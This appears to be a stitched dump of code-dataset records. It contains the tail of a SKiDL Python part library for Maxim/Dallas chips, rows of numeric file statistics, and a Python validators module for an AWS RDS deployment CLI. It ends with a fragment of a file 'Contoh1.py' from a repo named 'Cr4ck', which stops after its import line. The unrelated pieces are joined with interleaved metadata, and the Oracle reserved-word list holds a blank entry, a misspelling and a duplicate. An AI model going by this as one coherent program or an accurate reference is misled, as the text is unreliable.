Part(name='DS18B20U',dest=TEMPLATE,tool=SKIDL,keywords='OneWire 1-Wire 1Wire Maxim Dallas',description='Programmable Resolution 1-Wire Digital Thermometer MSOP-8',ref_prefix='U',num_units=1,fplist=['MSOP-8_3x3mm_Pitch0.65mm', 'MSOP-8_3x3mm_Pitch0.65mm*'],do_erc=True,pins=[
Pin(num='1',name='DQ',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='8',name='VDD',func=Pin.PWRIN,do_erc=True)]),
Part(name='DS2401P',dest=TEMPLATE,tool=SKIDL,keywords='OneWire 1-Wire 1Wire Maxim Dallas ID',description='Silicon Serial Number TSSOP-6',ref_prefix='U',num_units=1,fplist=['TSSOP-6'],do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='DQ',func=Pin.BIDIR,do_erc=True)]),
Part(name='DS2401Z',dest=TEMPLATE,tool=SKIDL,keywords='OneWire 1-Wire 1Wire Maxim Dallas ID',description='Silicon Serial Number SOT-223',ref_prefix='U',num_units=1,fplist=['SOT-223', 'SOT-223*'],do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='DQ',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='DS2482-100',dest=TEMPLATE,tool=SKIDL,keywords='1-Wire I2C',description='Single-Channel 1-Wire Master, SOIC-8',ref_prefix='U',num_units=1,fplist=['SOIC*3.9x4.9mm*Pitch1.27mm*'],do_erc=True,pins=[
Pin(num='1',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='4',name='SCL',do_erc=True),
Pin(num='5',name='SDA',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='PCTLZ',func=Pin.OUTPUT,do_erc=True),
Pin(num='7',name='AD1',do_erc=True),
Pin(num='8',name='AD0',do_erc=True)]),
Part(name='DS28EA00',dest=TEMPLATE,tool=SKIDL,keywords='1Wire OneWire Maxim Dallas',description='1-Wire Digital Thermometer with Sequence Detect and PIO',ref_prefix='U',num_units=1,fplist=['MSOP-8_3x3mm_Pitch0.65mm', 'MSOP-8_3x3mm_Pitch0.65mm*'],do_erc=True,pins=[
Pin(num='1',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='6',name='PIOA',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='PIOB',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='VCC',func=Pin.PWRIN,do_erc=True)]),
Part(name='DS3231',dest=TEMPLATE,tool=SKIDL,keywords='RTC TCXO Realtime Time Clock Crystal Oscillator I2C',description='Extremely Accurate I2C-Integrated RTC/TCXO/Crystal SOIC-16',ref_prefix='U',num_units=1,fplist=['SOIC-*_7.5x10.3mm_Pitch1.27mm*'],do_erc=True,pins=[
Pin(num='1',name='32KHZ',func=Pin.OPENCOLL,do_erc=True),
Pin(num='2',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='~INT~/SQW',func=Pin.OPENCOLL,do_erc=True),
Pin(num='4',name='~RST',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='NC',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='NC',func=Pin.PASSIVE,do_erc=True),
Pin(num='7',name='NC',func=Pin.PASSIVE,do_erc=True),
Pin(num='8',name='NC',func=Pin.PASSIVE,do_erc=True),
Pin(num='9',name='NC',func=Pin.PASSIVE,do_erc=True),
Pin(num='10',name='NC',func=Pin.PASSIVE,do_erc=True),
Pin(num='11',name='NC',func=Pin.PASSIVE,do_erc=True),
Pin(num='12',name='NC',func=Pin.PASSIVE,do_erc=True),
Pin(num='13',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='14',name='VBAT',func=Pin.PWRIN,do_erc=True),
Pin(num='15',name='SDA',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='SCL',do_erc=True)]),
Part(name='DS3231MZ',dest=TEMPLATE,tool=SKIDL,keywords='RTC TCXO Realtime Time Clock MEMS I2C',description='±5ppm, I2C Real-Time Clock SOIC-8',ref_prefix='U',num_units=1,fplist=['SOIC*3.9x4.9mm*Pitch1.27mm*'],do_erc=True,pins=[
Pin(num='1',name='32KHZ',func=Pin.OPENCOLL,do_erc=True),
Pin(num='2',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='~INT~/SQW',func=Pin.OPENCOLL,do_erc=True),
Pin(num='4',name='~RST',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='6',name='VBAT',func=Pin.PWRIN,do_erc=True),
Pin(num='7',name='SDA',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='SCL',do_erc=True)]),
Part(name='DS3232M',dest=TEMPLATE,tool=SKIDL,keywords='RTC TCXO Realtime Time Clock MEMS SRAM I2C',description='±5ppm, I2C Real-Time Clock with SRAM SOIC-8',ref_prefix='U',num_units=1,fplist=['SOIC-*_3.9x4.9mm_Pitch1.27mm*'],do_erc=True,pins=[
Pin(num='1',name='32KHZ',func=Pin.OUTPUT,do_erc=True),
Pin(num='2',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='~INT~/SQW',func=Pin.OPENCOLL,do_erc=True),
Pin(num='4',name='~RST',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='6',name='VBAT',func=Pin.PWRIN,do_erc=True),
Pin(num='7',name='SDA',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='SCL',do_erc=True)]),
Part(name='MAX1248',dest=TEMPLATE,tool=SKIDL,keywords='10-Bit ADC Serial 4-Channel Maxim',description='4-Channel 10-Bit ADC with Serial Interface, +2.7V to +5.25V, Low-Power',ref_prefix='U',num_units=1,fplist=['DIP*', 'QSOP*'],do_erc=True,aliases=['MAX1249'],pins=[
Pin(num='1',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='CH0',do_erc=True),
Pin(num='3',name='CH1',do_erc=True),
Pin(num='4',name='CH2',do_erc=True),
Pin(num='5',name='CH3',do_erc=True),
Pin(num='6',name='COM',func=Pin.PWRIN,do_erc=True),
Pin(num='7',name='~SHDN',func=Pin.TRISTATE,do_erc=True),
Pin(num='8',name='VREF',func=Pin.PWRIN,do_erc=True),
Pin(num='9',name='REFADJ',do_erc=True),
Pin(num='10',name='AGND',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='DGND',func=Pin.PWRIN,do_erc=True),
Pin(num='12',name='DOUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='13',name='SSTRB',func=Pin.OUTPUT,do_erc=True),
Pin(num='14',name='DIN',do_erc=True),
Pin(num='15',name='~CS',do_erc=True),
Pin(num='16',name='SCLK',do_erc=True)]),
Part(name='MAX2606',dest=TEMPLATE,tool=SKIDL,do_erc=True,aliases=['MAX2505', 'MAX2507', 'MAX2508', 'MAX2509']),
Part(name='MAX31820',dest=TEMPLATE,tool=SKIDL,keywords='OneWire 1-Wire 1Wire Maxim Dallas',description='1-Wire Ambient Temperature Sensor',ref_prefix='U',num_units=1,fplist=['TO-92_*'],do_erc=True,aliases=['DS1822', 'DS18B20', 'DS18S20', 'DS1821C'],pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='DQ',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='VDD',func=Pin.PWRIN,do_erc=True)]),
Part(name='MAX31820PAR',dest=TEMPLATE,tool=SKIDL,keywords='OneWire 1-Wire 1Wire Maxim Dallas',description='1-Wire, Parasite-Power, Ambient Temperature Sensor',ref_prefix='U',num_units=1,fplist=['TO-92_*'],do_erc=True,aliases=['DS1822-PAR', 'DS18B20-PAR', 'DS18S20-PAR', 'DS2401'],pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='DQ',func=Pin.BIDIR,do_erc=True)]),
Part(name='MAX31826',dest=TEMPLATE,tool=SKIDL,keywords='1Wire OneWire Maxim Dallas',description='1-Wire Digital Temperature Sensor with 1Kb Lockable EEPROM',ref_prefix='U',num_units=1,fplist=['MSOP-8_3x3mm_Pitch0.65mm', 'MSOP-8_3x3mm_Pitch0.65mm*'],do_erc=True,pins=[
Pin(num='1',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='DQ',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='5',name='AD0',do_erc=True),
Pin(num='6',name='AD1',do_erc=True),
Pin(num='7',name='AD2',do_erc=True),
Pin(num='8',name='AD3',do_erc=True)]),
Part(name='MAX453',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='MAX5436',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='MAX6355',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='MAX7325AEG+',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='Max691',dest=TEMPLATE,tool=SKIDL,do_erc=True)])
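# Example usage (a sketch, assuming skidl is installed and this module has been
# imported so that `maxim` is in scope): copy a template part into a circuit and
# wire its pins by name.
#   from skidl import Net
#   rtc = Part(maxim, 'DS3231')   # instantiate the DS3231 RTC from the library
#   Net('SCL') += rtc['SCL']      # connect the I2C clock pin
#   Net('SDA') += rtc['SDA']      # connect the I2C data pin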
| 80.56 | 305 | 0.624486 | 2,298 | 14,098 | 3.729765 | 0.097476 | 0.098588 | 0.177459 | 0.173609 | 0.886128 | 0.871544 | 0.867343 | 0.815774 | 0.765138 | 0.718119 | 0 | 0.051759 | 0.161299 | 14,098 | 174 | 306 | 81.022989 | 0.672953 | 0 | 0 | 0.354651 | 0 | 0.005814 | 0.199887 | 0.029082 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.151163 | 0.005814 | 0 | 0.005814 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
71265ffa427e3827efca9687a07121bd15532f2e | 13919 | py | Python | cli/cli_validators.py | salbac/AWS-RDS-Deploy | ["MIT"]
from PyInquirer import ValidationError, Validator
import re
import string
class RdsInstanceNameValidator(Validator):
    def validate(self, document):
        if len(document.text) < 1 or len(document.text) > 64:
            raise ValidationError(message='Instance name must be between 1 and 64 characters long')
        allowed = set(string.ascii_letters).union(string.digits).union('-')
        if not all(c in allowed for c in document.text):
            raise ValidationError(message='The instance name only allows letters, numbers or -')
        # The original character loop rejected any repeated character; only a doubled
        # hyphen is actually invalid.
        if '--' in document.text:
            raise ValidationError(message="The instance name can't contain 2 consecutive -")
        if document.text.endswith('-'):
            raise ValidationError(message="The instance name can't end with -")
class OracleSystemIdValidator(Validator):
def validate(self, document):
oracle_reserved_words = ["ACCESS", "ACCOUNT", "ACTIVATE", "ADD", "ADMIN", "ADVISE", "AFTER", "ALL", "ALL_ROWS", "ALLOCATE", "ALTER", "ANALYZE", "AND", "ANY", "ARCHIVE", "ARCHIVELOG", "ARRAY", "AS", "ASC", "AT", "AUDIT", "AUTHENTICATED", "AUTHORIZATION", "AUTOEXTEND", "AUTOMATIC", "BACKUP", "BECOME", "BEFORE", "BEGIN", "BETWEEN", "BFILE", "BITMAP", "BLOB", "BLOCK", "BODY", "BY", "CACHE", "CACHE_INSTANCES", "CANCEL", "CASCADE", "CAST", "CFILE", "CHAINED", "CHANGE", "CHAR", "CHAR_CS", "CHARACTER", "CHECK", "CHECKPOINT", "CHOOSE", "CHUNK", "CLEAR", "CLOB", "CLONE", "CLOSE", "CLOSE_CACHED_OPEN_CURSORS", "CLUSTER", "COALESCE", "COLUMN", "COLUMNS", "COMMENT", "COMMIT", "COMMITTED", "COMPATIBILITY", "COMPILE", "COMPLETE", "COMPOSITE_LIMIT", "COMPRESS", "COMPUTE", "CONNECT", "CONNECT_TIME", "CONSTRAINT", "CONSTRAINTS", "CONTENTS", "CONTINUE", "CONTROLFILE", "CONVERT", "COST", "CPU_PER_CALL", "CPU_PER_SESSION", "CREATE", "CURRENT", "CURRENT_SCHEMA", "CURREN_USER", "CURSOR", "CYCLE", " ", "DANGLING", "DATABASE", "DATAFILE", "DATAFILES", "DATAOBJNO", "DATE", "DBA", "DBHIGH", "DBLOW", "DBMAC", "DEALLOCATE", "DEBUG", "DEC", "DECIMAL", "DECLARE", "DEFAULT", "DEFERRABLE", "DEFERRED", "DEGREE", "DELETE", "DEREF", "DESC", "DIRECTORY", "DISABLE", "DISCONNECT", "DISMOUNT", "DISTINCT", "DISTRIBUTED", "DML", "DOUBLE", "DROP", "DUMP", "EACH", "ELSE", "ENABLE", "END", "ENFORCE", "ENTRY", "ESCAPE", "EXCEPT", "EXCEPTIONS", "EXCHANGE", "EXCLUDING", "EXCLUSIVE", "EXECUTE", "EXISTS", "EXPIRE", "EXPLAIN", "EXTENT", "EXTENTS", "EXTERNALLY", "FAILED_LOGIN_ATTEMPTS", "FALSE", "FAST", "FILE", "FIRST_ROWS", "FLAGGER", "FLOAT", "FLOB", "FLUSH", "FOR", "FORCE", "FOREIGN", "FREELIST", "FREELISTS", "FROM", "FULL", "FUNCTION", "GLOBAL", "GLOBALLY", "GLOBAL_NAME", "GRANT", "GROUP", "GROUPS", "HASH", "HASHKEYS", "HAVING", "HEADER", "HEAP", "IDENTIFIED", "IDGENERATORS", "IDLE_TIME", "IF", "IMMEDIATE", "IN", "INCLUDING", "INCREMENT", "INDEX", "INDEXED", "INDEXES", "INDICATOR", "IND_PARTITION", "INITIAL", "INITIALLY", "INITRANS", "INSERT", "INSTANCE", "INSTANCES", "INSTEAD", "INT", "INTEGER", "INTERMEDIATE", "INTERSECT", "INTO", "IS", "ISOLATION", "ISOLATION_LEVEL", "KEEP", "KEY", "KILL", "LABEL", "LAYER", "LESS", "LEVEL", "LIBRARY", "LIKE", "LIMIT", "LINK", "LIST", "LOB", "LOCAL", "LOCK", "LOCKED", "LOG", "LOGFILE", "LOGGING", "LOGICAL_READS_PER_CALL", "LOGICAL_READS_PER_SESSION", "LONG", "MANAGE", "MASTER", "MAX", "MAXARCHLOGS", "MAXDATAFILES", "MAXEXTENTS", "MAXINSTANCES", "MAXLOGFILES", "MAXLOGHISTORY", "MAXLOGMEMBERS", "MAXSIZE", "MAXTRANS", "MAXVALUE", "MIN", "MEMBER", "MINIMUM", "MINEXTENTS", "MINUS", "MINVALUE", "MLSLABEL", "MLS_LABEL_FORMAT", "MODE", "MODIFY", "MOUNT", "MOVE", "MTS_DISPATCHERS", "MULTISET", "NATIONAL", "NCHAR", "NCHAR_CS", "NCLOB", "NEEDED", "NESTED", "NETWORK", "NEW", "NEXT", "NOARCHIVELOG", "NOAUDIT", "NOCACHE", "NOCOMPRESS", "NOCYCLE", "NOFORCE", "NOLOGGING", "NOMAXVALUE", "NOMINVALUE", "NONE", "NOORDER", "NOOVERRIDE", "NOPARALLEL", "NOPARALLEL", "NOREVERSE", "NORMAL", "NOSORT", "NOT", "NOTHING", "NOWAIT", "NULL", "NUMBER", "NUMERIC", "NVARCHAR2", "OBJECT", "OBJNO", "OBJNO_REUSE", "OF", "OFF", "OFFLINE", "OID", "OIDINDEX", "OLD", "ON", "ONLINE", "ONLY", "OPCODE", "OPEN", "OPTIMAL", "OPTIMIZER_GOAL", "OPTION", "OR", "ORDER", "ORGANIZATION", "OSLABEL", "OVERFLOW", "OWN", "PACKAGE", "PARALLEL", "PARTITION", "PASSWORD", "PASSWORD_GRACE_TIME", "PASSWORD_LIFE_TIME", "PASSWORD_LOCK_TIME", "PASSWORD_REUSE_MAX", "PASSWORD_REUSE_TIME", "PASSWORD_VERIFY_FUNCTION", "PCTFREE", "PCTINCREASE", "PCTTHRESHOLD", "PCTUSED", 
"PCTVERSION", "PERCENT", "PERMANENT", "PLAN", "PLSQL_DEBUG", "POST_TRANSACTION", "PRECISION", "PRESERVE", "PRIMARY", "PRIOR", "PRIVATE", "PRIVATE_SGA", "PRIVILEGE", "PRIVILEGES", "PROCEDURE", "PROFILE", "PUBLIC", "PURGE", "QUEUE", "QUOTA", "RANGE", "RAW", "RBA", "READ", "READUP", "REAL", "REBUILD", "RECOVER", "RECOVERABLE", "RECOVERY", "REF", "REFERENCES", "REFERENCING", "REFRESH", "RENAME", "REPLACE", "RESET", "RESETLOGS", "RESIZE", "RESOURCE", "RESTRICTED", "RETURN", "RETURNING", "REUSE", "REVERSE", "REVOKE", "ROLE", "ROLES", "ROLLBACK", "ROW", "ROWID", "ROWNUM", "ROWS", "RULE", "SAMPLE", "SAVEPOINT", "SB4", "SCAN_INSTANCES", "SCHEMA", "SCN", "SCOPE", "SD_ALL", "SD_INHIBIT", "SD_SHOW", "SEGMENT", "SEG_BLOCK", "SEG_FILE", "SELECT", "SEQUENCE", "SERIALIZABLE", "SESSION", "SESSION_CACHED_CURSORS", "SESSIONS_PER_USER", "SET", "SHARE", "SHARED", "SHARED_POOL", "SHRINK", "SIZE", "SKIP", "SKIP_UNUSABLE_INDEXES", "SMALLINT", "SNAPSHOT", "SOME", "SORT", "SPECIFICATION", "SPLIT", "SQL_TRACE", "STANDBY", "START", "STATEMENT_ID", "STATISTICS", "STOP", "STORAGE", "STORE", "STRUCTURE", "SUCCESSFUL", "SWITCH", "SYS_OP_ENFORCE_NOT_NULL$", "SYS_OP_NTCIMG$", "SYNONYM", "SYSDATE", "SYSDBA", "SYSOPER", "SYSTEM", "TABLE", "TABLES", "TABLESPACE", "TABLESPACE_NO", "TABNO", "TEMPORARY", "THAN", "THE", "THEN", "THREAD", "TIMESTAMP", "TIME", "TO", "TOPLEVEL", "TRACE", "TRACING", "TRANSACTION", "TRANSITIONAL", "TRIGGER", "TRIGGERS", "TRUE", "TRUNCATE", "TX", "TYPE", "UB2", "UBA", "UID", "UNARCHIVED", "UNDO", "UNION", "UNIQUE", "UNLIMITED", "UNLOCK", "UNRECOVERABLE", "UNTIL", "UNUSABLE", "UNUSED", "UPDATABLE", "UPDATE", "USAGE", "USE", "USER", "USING", "VALIDATE", "VALIDATION", "VALUE", "VALUES", "VARCHAR", "VARCHAR2", "VARYING", "VIEW", "WHEN", "WHENEVER", "WHERE", "WITH", "WITHOUT", "WORK", "WRITE", "WRITEDOWN", "WRITEUP", "XID", "YEAR", "ZONE"]
if document.text.upper() in oracle_reserved_words:
raise ValidationError(message="Can't use Oracle reserved words.")
elif len(document.text) == 0 or len(document.text) > 8:
            raise ValidationError(message='SID length must be between 1 and 8 characters')
class EmptyValidator(Validator):
def validate(self, document):
if len(document.text) == 0:
raise ValidationError(message='Enter value')
class IntegerValidator(Validator):
def validate(self, document):
if len(document.text) == 0:
raise ValidationError(message='Enter value')
try:
int(document.text)
        except ValueError:
            raise ValidationError(message='Enter valid integer value')
class PortValidator(Validator):
    def validate(self, document):
        if len(document.text) == 0:
            raise ValidationError(message='Enter value')
        # Confirm the input is an integer before comparing it, so non-numeric
        # input raises a ValidationError instead of an unhandled ValueError.
        try:
            port = int(document.text)
        except ValueError:
            raise ValidationError(message='Enter valid integer value')
        if port < 1150 or port > 65535:
            raise ValidationError(message='Enter valid port number in range 1150-65535')
class MasterUsernameValidator(Validator):
def validate(self, document):
if len(document.text) < 1 or len(document.text) > 30:
            raise ValidationError(message='Master Username length must be between 1 and 30 characters')
oracle_reserved_words = ["ACCESS", "ACCOUNT", "ACTIVATE", "ADD", "ADMIN", "ADVISE", "AFTER", "ALL", "ALL_ROWS", "ALLOCATE", "ALTER", "ANALYZE", "AND", "ANY", "ARCHIVE", "ARCHIVELOG", "ARRAY", "AS", "ASC", "AT", "AUDIT", "AUTHENTICATED", "AUTHORIZATION", "AUTOEXTEND", "AUTOMATIC", "BACKUP", "BECOME", "BEFORE", "BEGIN", "BETWEEN", "BFILE", "BITMAP", "BLOB", "BLOCK", "BODY", "BY", "CACHE", "CACHE_INSTANCES", "CANCEL", "CASCADE", "CAST", "CFILE", "CHAINED", "CHANGE", "CHAR", "CHAR_CS", "CHARACTER", "CHECK", "CHECKPOINT", "CHOOSE", "CHUNK", "CLEAR", "CLOB", "CLONE", "CLOSE", "CLOSE_CACHED_OPEN_CURSORS", "CLUSTER", "COALESCE", "COLUMN", "COLUMNS", "COMMENT", "COMMIT", "COMMITTED", "COMPATIBILITY", "COMPILE", "COMPLETE", "COMPOSITE_LIMIT", "COMPRESS", "COMPUTE", "CONNECT", "CONNECT_TIME", "CONSTRAINT", "CONSTRAINTS", "CONTENTS", "CONTINUE", "CONTROLFILE", "CONVERT", "COST", "CPU_PER_CALL", "CPU_PER_SESSION", "CREATE", "CURRENT", "CURRENT_SCHEMA", "CURREN_USER", "CURSOR", "CYCLE", " ", "DANGLING", "DATABASE", "DATAFILE", "DATAFILES", "DATAOBJNO", "DATE", "DBA", "DBHIGH", "DBLOW", "DBMAC", "DEALLOCATE", "DEBUG", "DEC", "DECIMAL", "DECLARE", "DEFAULT", "DEFERRABLE", "DEFERRED", "DEGREE", "DELETE", "DEREF", "DESC", "DIRECTORY", "DISABLE", "DISCONNECT", "DISMOUNT", "DISTINCT", "DISTRIBUTED", "DML", "DOUBLE", "DROP", "DUMP", "EACH", "ELSE", "ENABLE", "END", "ENFORCE", "ENTRY", "ESCAPE", "EXCEPT", "EXCEPTIONS", "EXCHANGE", "EXCLUDING", "EXCLUSIVE", "EXECUTE", "EXISTS", "EXPIRE", "EXPLAIN", "EXTENT", "EXTENTS", "EXTERNALLY", "FAILED_LOGIN_ATTEMPTS", "FALSE", "FAST", "FILE", "FIRST_ROWS", "FLAGGER", "FLOAT", "FLOB", "FLUSH", "FOR", "FORCE", "FOREIGN", "FREELIST", "FREELISTS", "FROM", "FULL", "FUNCTION", "GLOBAL", "GLOBALLY", "GLOBAL_NAME", "GRANT", "GROUP", "GROUPS", "HASH", "HASHKEYS", "HAVING", "HEADER", "HEAP", "IDENTIFIED", "IDGENERATORS", "IDLE_TIME", "IF", "IMMEDIATE", "IN", "INCLUDING", "INCREMENT", "INDEX", "INDEXED", "INDEXES", "INDICATOR", "IND_PARTITION", "INITIAL", "INITIALLY", "INITRANS", "INSERT", "INSTANCE", "INSTANCES", "INSTEAD", "INT", "INTEGER", "INTERMEDIATE", "INTERSECT", "INTO", "IS", "ISOLATION", "ISOLATION_LEVEL", "KEEP", "KEY", "KILL", "LABEL", "LAYER", "LESS", "LEVEL", "LIBRARY", "LIKE", "LIMIT", "LINK", "LIST", "LOB", "LOCAL", "LOCK", "LOCKED", "LOG", "LOGFILE", "LOGGING", "LOGICAL_READS_PER_CALL", "LOGICAL_READS_PER_SESSION", "LONG", "MANAGE", "MASTER", "MAX", "MAXARCHLOGS", "MAXDATAFILES", "MAXEXTENTS", "MAXINSTANCES", "MAXLOGFILES", "MAXLOGHISTORY", "MAXLOGMEMBERS", "MAXSIZE", "MAXTRANS", "MAXVALUE", "MIN", "MEMBER", "MINIMUM", "MINEXTENTS", "MINUS", "MINVALUE", "MLSLABEL", "MLS_LABEL_FORMAT", "MODE", "MODIFY", "MOUNT", "MOVE", "MTS_DISPATCHERS", "MULTISET", "NATIONAL", "NCHAR", "NCHAR_CS", "NCLOB", "NEEDED", "NESTED", "NETWORK", "NEW", "NEXT", "NOARCHIVELOG", "NOAUDIT", "NOCACHE", "NOCOMPRESS", "NOCYCLE", "NOFORCE", "NOLOGGING", "NOMAXVALUE", "NOMINVALUE", "NONE", "NOORDER", "NOOVERRIDE", "NOPARALLEL", "NOPARALLEL", "NOREVERSE", "NORMAL", "NOSORT", "NOT", "NOTHING", "NOWAIT", "NULL", "NUMBER", "NUMERIC", "NVARCHAR2", "OBJECT", "OBJNO", "OBJNO_REUSE", "OF", "OFF", "OFFLINE", "OID", "OIDINDEX", "OLD", "ON", "ONLINE", "ONLY", "OPCODE", "OPEN", "OPTIMAL", "OPTIMIZER_GOAL", "OPTION", "OR", "ORDER", "ORGANIZATION", "OSLABEL", "OVERFLOW", "OWN", "PACKAGE", "PARALLEL", "PARTITION", "PASSWORD", "PASSWORD_GRACE_TIME", "PASSWORD_LIFE_TIME", "PASSWORD_LOCK_TIME", "PASSWORD_REUSE_MAX", "PASSWORD_REUSE_TIME", "PASSWORD_VERIFY_FUNCTION", "PCTFREE", "PCTINCREASE", "PCTTHRESHOLD", "PCTUSED", 
"PCTVERSION", "PERCENT", "PERMANENT", "PLAN", "PLSQL_DEBUG", "POST_TRANSACTION", "PRECISION", "PRESERVE", "PRIMARY", "PRIOR", "PRIVATE", "PRIVATE_SGA", "PRIVILEGE", "PRIVILEGES", "PROCEDURE", "PROFILE", "PUBLIC", "PURGE", "QUEUE", "QUOTA", "RANGE", "RAW", "RBA", "READ", "READUP", "REAL", "REBUILD", "RECOVER", "RECOVERABLE", "RECOVERY", "REF", "REFERENCES", "REFERENCING", "REFRESH", "RENAME", "REPLACE", "RESET", "RESETLOGS", "RESIZE", "RESOURCE", "RESTRICTED", "RETURN", "RETURNING", "REUSE", "REVERSE", "REVOKE", "ROLE", "ROLES", "ROLLBACK", "ROW", "ROWID", "ROWNUM", "ROWS", "RULE", "SAMPLE", "SAVEPOINT", "SB4", "SCAN_INSTANCES", "SCHEMA", "SCN", "SCOPE", "SD_ALL", "SD_INHIBIT", "SD_SHOW", "SEGMENT", "SEG_BLOCK", "SEG_FILE", "SELECT", "SEQUENCE", "SERIALIZABLE", "SESSION", "SESSION_CACHED_CURSORS", "SESSIONS_PER_USER", "SET", "SHARE", "SHARED", "SHARED_POOL", "SHRINK", "SIZE", "SKIP", "SKIP_UNUSABLE_INDEXES", "SMALLINT", "SNAPSHOT", "SOME", "SORT", "SPECIFICATION", "SPLIT", "SQL_TRACE", "STANDBY", "START", "STATEMENT_ID", "STATISTICS", "STOP", "STORAGE", "STORE", "STRUCTURE", "SUCCESSFUL", "SWITCH", "SYS_OP_ENFORCE_NOT_NULL$", "SYS_OP_NTCIMG$", "SYNONYM", "SYSDATE", "SYSDBA", "SYSOPER", "SYSTEM", "TABLE", "TABLES", "TABLESPACE", "TABLESPACE_NO", "TABNO", "TEMPORARY", "THAN", "THE", "THEN", "THREAD", "TIMESTAMP", "TIME", "TO", "TOPLEVEL", "TRACE", "TRACING", "TRANSACTION", "TRANSITIONAL", "TRIGGER", "TRIGGERS", "TRUE", "TRUNCATE", "TX", "TYPE", "UB2", "UBA", "UID", "UNARCHIVED", "UNDO", "UNION", "UNIQUE", "UNLIMITED", "UNLOCK", "UNRECOVERABLE", "UNTIL", "UNUSABLE", "UNUSED", "UPDATABLE", "UPDATE", "USAGE", "USE", "USER", "USING", "VALIDATE", "VALIDATION", "VALUE", "VALUES", "VARCHAR", "VARCHAR2", "VARYING", "VIEW", "WHEN", "WHENEVER", "WHERE", "WITH", "WITHOUT", "WORK", "WRITE", "WRITEDOWN", "WRITEUP", "XID", "YEAR", "ZONE"]
if document.text.upper() in oracle_reserved_words:
raise ValidationError(message="Can't use Oracle reserved words.")
if document.text[0] not in set(string.ascii_letters):
raise ValidationError(message="The first master username character must be a letter.")
class MasterPasswordValidator(Validator):
def validate(self, document):
nok = re.findall("[/@]", document.text)
if nok:
raise ValidationError(message="Password can't contain / or @ ")
if len(document.text) < 8 or len(document.text) > 30:
raise ValidationError(message='Password must be length between 8 to 30 characters')
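# --- Usage sketch (an illustrative addition, not part of the original script).
# The Validator/ValidationError/document.text interface above matches
# prompt_toolkit's validation API, so -- assuming that is where these base
# classes come from -- the validators plug straight into an interactive prompt:
if __name__ == '__main__':
    from prompt_toolkit import prompt

    # validate() runs when the user accepts the input; a ValidationError
    # keeps the prompt open and displays its message.
    port = prompt('Port: ', validator=PortValidator())
    master_user = prompt('Master username: ', validator=MasterUsernameValidator())
    print(port, master_user)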
| 180.766234 | 5,416 | 0.646167 | 1,474 | 13,919 | 6 | 0.364315 | 0.031208 | 0.0519 | 0.018996 | 0.901289 | 0.889869 | 0.880145 | 0.880145 | 0.853573 | 0.853573 | 0 | 0.004512 | 0.124291 | 13,919 | 76 | 5,417 | 183.144737 | 0.72106 | 0 | 0 | 0.442623 | 0 | 0 | 0.541745 | 0.026441 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114754 | false | 0.081967 | 0.04918 | 0 | 0.278689 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
854043dd15c2876e35ac74b7461c56781f6e5bfa | 5,319 | py | Python | Contoh1.py | alobay/Cr4ck | 7523a12ef246553ccf0f88baa5179922c50de52a | [
"Apache-2.0"
] | 1 | 2020-11-01T23:41:15.000Z | 2020-11-01T23:41:15.000Z | Contoh1.py | alobay/Cr4ck | 7523a12ef246553ccf0f88baa5179922c50de52a | [
"Apache-2.0"
] | null | null | null | Contoh1.py | alobay/Cr4ck | 7523a12ef246553ccf0f88baa5179922c50de52a | [
"Apache-2.0"
] | null | null | null | import zlib,base64
